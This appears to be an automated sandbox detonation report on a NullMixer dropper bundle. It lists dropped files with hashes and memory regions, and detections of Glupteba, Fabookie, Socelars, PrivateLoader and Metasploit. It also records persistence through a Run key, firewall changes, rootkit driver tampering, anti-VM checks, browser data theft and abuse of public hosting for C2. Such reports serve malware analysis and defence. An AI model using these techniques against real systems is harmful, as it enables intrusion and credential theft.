memory/1836-187-0x0000000000400000-0x000000000042C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-I8UI7.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2632-199-0x0000000000480000-0x0000000000486000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SALSK.tmp\Wed10fa57e769925f6.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/448-198-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-GTV9T.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/408-210-0x0000000002500000-0x00000000027DD000-memory.dmp

memory/408-211-0x0000000002C30000-0x0000000002CDD000-memory.dmp

memory/408-215-0x0000000000C80000-0x0000000000D1A000-memory.dmp

memory/408-213-0x0000000000C80000-0x0000000000D1A000-memory.dmp

memory/408-212-0x0000000000C80000-0x0000000000D1A000-memory.dmp

memory/2984-228-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2984-226-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2984-225-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2984-224-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2984-222-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2984-220-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2984-218-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2984-216-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1988-240-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1988-239-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1988-238-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1988-237-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1988-235-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1988-233-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1988-231-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1000-257-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/2920-256-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1140-255-0x0000000000400000-0x000000000071A000-memory.dmp

memory/1824-254-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/2448-259-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2380-258-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2200-260-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/408-261-0x0000000002500000-0x00000000027DD000-memory.dmp

C:\Program Files (x86)\Gparted\Build.exe

MD5 c874508845d1c0bb486f5e41af8de480
SHA1 3ac7e246934ba74c1018d50138bea77b035d6f90
SHA256 4793a9e954f00007a2f352648cddbc30add3ff4b7f22c3e1500d3671b0eb36be
SHA512 80daa52fea184748c4b858af4c7a676dddddf4c3cfdfada44917abddb0495ab22a9728800ea7f408fb3e66c269eda9df2462a9f82cf6a57c254d6c233c46f758

memory/2604-316-0x0000000000250000-0x0000000000272000-memory.dmp

memory/2604-317-0x0000000000660000-0x0000000000668000-memory.dmp

memory/2908-334-0x0000000000520000-0x0000000000B08000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/2908-343-0x00000000006F0000-0x0000000000CD8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab4C6B.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LWO3RY20FVQAOPBHSTHK.temp

MD5 2d33c01f49f1bdd60fe7aff24ae5772b
SHA1 83c3fac2f868c972b357a4be69fc384d207da6d7
SHA256 2be80eb8dc21b752dc538a3ec89099ce4b423f7b598f5023a27e00e14cf4b037
SHA512 09175799d4917b767785ecaa001a1ba232f00db26aff1923463e7bbf4898aa5ab192fc77b00b7634489a9615cc2dc5e95e3989769f4c471730fb846f33111f01

C:\Program Files (x86)\Gparted\gimagex.exe

MD5 85199ea4a530756b743ad4491ea84a44
SHA1 0842cd749986d65d400a9605d17d2ed7a59c13cc
SHA256 3ea24d7899169c28d505233e13b9c92b51cd1181be299487392700d29e13b9aa
SHA512 b82b1c0ba24fa3e4c1f5309eee4cc6be0dfcc20f64886a40e4eb35d804f36af864b3e4218d7f27f439fa45659af0d69410798c9b3d1e5cab5a259759b7ad1f99

memory/2908-369-0x0000000000520000-0x0000000000B08000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar7051.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-07 05:21

Reported

2024-11-07 05:23

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Glupteba

loader dropper glupteba

Glupteba family

glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-Q6HS0.tmp\Wed10fa57e769925f6.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Gparted\Build.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10d7483856.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a80f141fb08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-Q6HS0.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QUT4G.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AncientDawn = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Gparted\gimagex.exe C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\is-D2JOK.tmp C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\is-LLGF4.tmp C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_240637312 C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.sfx.exe C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\is-N8LR0.tmp C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\rss\csrss.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10b607271059cb7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-Q6HS0.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-QUT4G.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\gimagex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" C:\Windows\rss\csrss.exe N/A
